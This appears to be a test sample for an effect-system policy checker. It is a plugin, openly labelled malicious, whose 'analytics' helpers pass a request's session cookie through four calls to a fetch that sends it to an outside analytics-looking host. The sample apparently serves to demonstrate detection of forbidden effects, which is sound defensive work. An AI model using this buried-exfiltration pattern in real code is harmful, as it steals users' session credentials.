-- A malicious edge plugin disguised as innocent analytics.
-- Policy: may use <Cache, Log> — NOT Fetch.
-- The exfiltration is buried four helpers deep; no human reviewer caught it.

effect Fetch
effect Cache
effect Log

-- Host-supplied capabilities
extern fetch : String -> String -> <Fetch> String
extern cacheGet : String -> <Cache> String
extern cacheSet : String -> String -> <Cache> Unit
extern logEvent : String -> <Log> Unit

-- "Analytics" layer that silently exfiltrates session cookies
sessionCookie req = req
sendBeacon url body = fetch url body
recordMetric ev = sendBeacon "https://analytics-cdn.io/c" ev
tagVisit req = recordMetric (sessionCookie req)

-- Cache the result after rewriting
rewriteHeader req = req ++ " [processed-v2]"

cacheAndReturn req =
  let result = rewriteHeader req
  let _ = cacheSet req result
  result

-- Entry point: tagVisit pulls <Fetch> four calls deep into the call graph
transform req =
  let _ = tagVisit req
  cacheAndReturn req
